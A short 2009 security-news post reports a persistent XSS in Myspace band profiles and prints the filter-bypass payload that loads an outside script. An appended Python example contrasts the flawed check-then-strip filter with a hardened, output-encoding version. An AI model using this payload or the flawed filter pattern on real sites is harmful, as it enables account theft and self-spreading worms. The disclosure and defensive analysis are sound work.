Myspace.com hit by a Permanent XSS
Written by KF
Wednesday, 28 January 2009
Note 02/02/09: TrainReq (Josh Holly) reportedly discovered the vulnerability first, in the film profiles.
Daniel Lo Nigro has discovered a trick to bypass the Myspace filters and insert a script on a Myspace band profile. Myspace prevents <script> from being written in a band website URL, but it also strips "http://" out of the URL, so the filter can be bypassed this way:
URL: test.com?<scrihttp://pt src=//site.com/xss.js>
Or have a look at Daniel's harmless example:
Daniel says he alerted Myspace but that they never answered him.
Here is the mirror of the XSS:
This XSS could be exploited to spread a worm, steal Myspace accounts, etc.
In the past Myspace was hit by a number of security issues, including the "Samy" XSS worm.
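The bypass works because the <script> check runs on the submitted value while the "http://" stripping changes that value afterwards. The following is an added example, not from the original article and not Myspace's code: it models that order in Python next to a version that strips to a fixed point, validates the final value and encodes on output. The function names and the allowlist are assumptions.

```python
import html
import re

SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)
# Constructed allowlist for a host/path/query value (assumption, not Myspace's rule).
SAFE_URL = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!$&()*+,;=%-]+")

# The URL value quoted in the article.
PAYLOAD = "test.com?<scrihttp://pt src=//site.com/xss.js>"


def flawed_filter(url):
    """Blocklist check first, then strip: the order the article describes."""
    if SCRIPT_TAG.search(url):
        return None  # rejected
    # Transforming after the check lets the removal join "<scri" and "pt".
    return url.replace("http://", "")


def strip_scheme(url):
    """Remove "http://" repeatedly until the value stops changing."""
    while True:
        stripped = re.sub(r"http://", "", url, flags=re.IGNORECASE)
        if stripped == url:
            return url
        url = stripped


def hardened_filter(url):
    """Transform first, then validate the final value against an allowlist."""
    normalized = strip_scheme(url)
    return normalized if SAFE_URL.fullmatch(normalized) else None


def render_link(url):
    """Encode on output so a value that slips past a filter cannot open a tag."""
    safe = html.escape(url, quote=True)
    return '<a href="http://{0}">{0}</a>'.format(safe)


if __name__ == "__main__":
    print("flawed   :", flawed_filter(PAYLOAD))
    print("hardened :", hardened_filter(PAYLOAD))
    print("rendered :", render_link(flawed_filter(PAYLOAD)))
```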